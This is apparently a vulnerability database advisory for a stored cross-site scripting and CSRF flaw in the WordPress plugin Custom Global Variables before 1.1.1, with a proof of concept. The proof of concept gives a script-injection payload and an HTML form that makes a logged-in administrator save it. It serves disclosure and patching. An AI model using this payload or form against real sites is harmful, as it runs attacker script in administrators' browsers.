WordPress Plugin Vulnerabilities

Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)

Description

The plugin does not sanitise the 'name' field of the variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged in administrator add the payload and make them perform further unwanted actions.

Proof of Concept

As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add whatever value in the 'value' field and submit it

Via CSRF:
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
      <input type="hidden" name="vars[1][name]" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="vars[1][val]" value="a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
custom-global-variables
Fixed in 1.1.1

References

Exploitdb
49406

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.3 (high)

Miscellaneous

Original Researcher
Swapnil Subhash Bodekar
Verified
Yes
WPVDB ID
0480b2e3-5b3d-4eaf-9496-6a135f7cf4c9

Timeline

Publicly Published
2021-01-11 (about 2 years ago)
Added
2021-01-11 (about 2 years ago)
Last Updated
2021-03-10 (about 2 years ago)

Other

Published
Title
Published
2021-07-01
Title
Cooked < 1.7.9.1- Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2014-08-01
Title
Duplicate Post 2.5 - options-general.php post Parameter Reflected XSS
Published
2022-06-13
Title
Gallery < 2.0.0 - Reflected Cross-Site Scripting
Published
2014-08-01
Title
yolink Search 2.5 - "s" Cross-Site Scripting
Published
2023-03-17
Title
WP Express Checkout < 2.2.9 - Admin+ Stored XSS